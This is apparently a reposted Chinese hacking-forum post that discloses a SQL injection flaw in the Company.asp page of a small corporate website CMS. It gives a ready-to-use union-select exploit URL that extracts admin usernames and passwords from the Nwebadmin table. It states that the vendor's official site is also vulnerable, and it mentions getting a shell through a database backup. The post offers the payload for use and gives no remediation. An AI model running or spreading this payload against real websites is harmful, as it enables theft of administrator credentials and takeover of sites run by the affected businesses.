话说天天看90sec的大牛们无聊乱丢Oday,小菜我等实在是诚惶诚恐啊。。。
在站长之家下了个小程序,一个简单的漏洞。。大牛莫笑,,不要踩俺。。谢谢。。
文件:Company.asp
什么都没过滤。。
exp:
Company.asp?id=2 union select 1,username,password,4,5,6,7,8 from Nwebadmin
官网也存在。。
备份数据库可以拿到shell。
PS:chmodx大大真的是个好人,教会了我很多。爱死他了~~~~~
转自:http://www.90sec.org/thread-1640-1-1.html
文章来源于lcx.cc:企成电气公司企业网站管理系统v1.0(中英文版)漏洞
相关推荐: 使用WiFi真的有那么危险吗?安全科普:教你增强自己的无线网络安全
0x00 背景 在知乎专栏上看到一篇文章《WiFi里的猫腻》,作者继续之前宣传的路由威胁,在互联网上疯传,搞得周围好多不懂的朋友一直问: 路由这么危险,我该怎么办啊??? 在这篇文章之前,作者及其团队成员就已经开始宣传路由的危险,似乎每个人用路由的人都会被别人…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论